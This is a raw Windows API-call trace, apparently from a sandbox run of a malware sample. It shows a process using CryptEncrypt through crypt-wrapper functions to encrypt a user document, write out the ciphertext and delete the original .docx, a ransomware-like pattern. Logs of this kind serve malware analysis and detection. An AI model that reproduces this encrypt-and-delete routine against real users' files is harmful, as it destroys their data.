0x43a8f48 [0077.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0077.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0077.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0077.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0077.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0077.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0077.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0077.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0077.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0077.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0077.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0077.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0077.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0077.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0077.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0077.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0077.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0077.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0077.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0077.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0077.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0077.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0077.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0077.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0077.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0077.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0077.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0077.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0077.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0077.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0077.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0077.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0077.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0077.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0077.289] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0077.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0077.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0077.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0077.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0077.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0077.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0077.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0077.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0077.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0077.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0077.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0077.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0077.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0077.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0077.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0077.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0077.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0077.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0077.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0077.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0077.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0077.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0077.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0077.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0077.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0077.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0077.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0077.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0077.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0077.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0077.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0077.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0077.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0077.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0077.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796f28 [0077.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796f28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0077.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0077.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0077.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0077.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0077.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0077.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0077.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0077.291] CryptGetKeyParam (in: hKey=0x41ac700, dwParam=0x7, pbData=0x43e2570, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2570*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0077.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0077.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0077.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0077.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0077.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0077.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0077.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0077.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0077.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0077.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0077.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0077.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0077.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0077.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0077.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0077.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0077.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0077.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0077.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0077.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d88 [0077.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0077.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0077.295] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.295] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.295] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.295] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.296] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0077.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca7f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0077.296] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x7490, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x74a0) returned 1 [0077.297] CharLowerBuffW (in: lpsz="byte[29857]", cchLength=0xb | out: lpsz="byte[29857]") returned 0xb [0077.298] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.298] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0077.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cab50, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0077.298] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4905e10*, pdwDataLen=0x144e790*=0x7490, dwBufLen=0x74a0 | out: pbData=0x4905e10*, pdwDataLen=0x144e790*=0x74a0) returned 1 [0077.298] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.298] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.298] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.300] WriteFile (in: hFile=0x258, lpBuffer=0x492a568*, nNumberOfBytesToWrite=0x74a0, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x492a568*, lpNumberOfBytesWritten=0x144f194*=0x74a0, lpOverlapped=0x0) returned 1 [0077.302] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0077.302] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.302] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0077.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca700, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0077.302] CryptDestroyKey (hKey=0x41ac700) returned 1 [0077.302] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.302] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.302] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.302] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.302] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.302] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.302] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.302] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0077.303] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0077.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796f28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0077.303] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0077.303] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.303] FreeLibrary (hLibModule=0x756e0000) returned 1 [0077.303] CloseHandle (hObject=0x298) returned 1 [0077.303] CloseHandle (hObject=0x258) returned 1 [0077.305] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\NHgtkAPLnX.docx", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\NHgtkAPLnX.docx", lpFilePart=0x0) returned 0x29 [0077.305] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\NHgtkAPLnX.docx" (normalized: "c:\\users\\fd1hvy\\documents\\nhgtkaplnx.docx")) returned 0x20 [0077.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0077.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0077.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0077.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0077.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0077.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0077.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0077.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0077.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0077.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0077.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0077.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0077.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0077.306] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\NHgtkAPLnX.docx", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4814be60, ftCreationTime.dwHighDateTime=0x1d59a5e, ftLastAccessTime.dwLowDateTime=0x7b674560, ftLastAccessTime.dwHighDateTime=0x1d575df, ftLastWriteTime.dwLowDateTime=0x7b674560, ftLastWriteTime.dwHighDateTime=0x1d575df, nFileSizeHigh=0x0, nFileSizeLow=0x7490, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="NHgtkAPLnX.docx", cAlternateFileName="NHGTKA~1.DOC")) returned 0x41ac440 [0077.306] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\NHgtkAPLnX.docx" (normalized: "c:\\users\\fd1hvy\\documents\\nhgtkaplnx.docx")) returned 1 [0077.353] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4814be60, ftCreationTime.dwHighDateTime=0x1d59a5e, ftLastAccessTime.dwLowDateTime=0x7b674560, ftLastAccessTime.dwHighDateTime=0x1d575df, ftLastWriteTime.dwLowDateTime=0x7b674560, ftLastWriteTime.dwHighDateTime=0x1d575df, nFileSizeHigh=0x0, nFileSizeLow=0x7490, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="NHgtkAPLnX.docx", cAlternateFileName="NHGTKA~1.DOC")) returned 0 [0077.353] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0077.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0077.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0077.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0077.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0077.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359ba0 | out: hHeap=0x1780000) returned 1 [0077.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0077.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0077.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0077.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0077.354] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0077.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0077.354] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0077.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0077.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0077.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0077.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9938 | out: hHeap=0x1780000) returned 1 [0077.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0077.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0077.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0077.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0077.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0077.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42d9c20 | out: hHeap=0x1780000) returned 1 [0077.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0077.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c98f0 | out: hHeap=0x1780000) returned 1 [0077.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0077.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0077.355] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0077.355] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0077.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0077.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0077.355] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0077.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0077.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0077.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0077.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2270 [0077.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0077.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c98f0 [0077.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0077.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0077.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0077.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0077.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0077.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22e0 [0077.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0077.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0077.355] RtlAllocateHeap 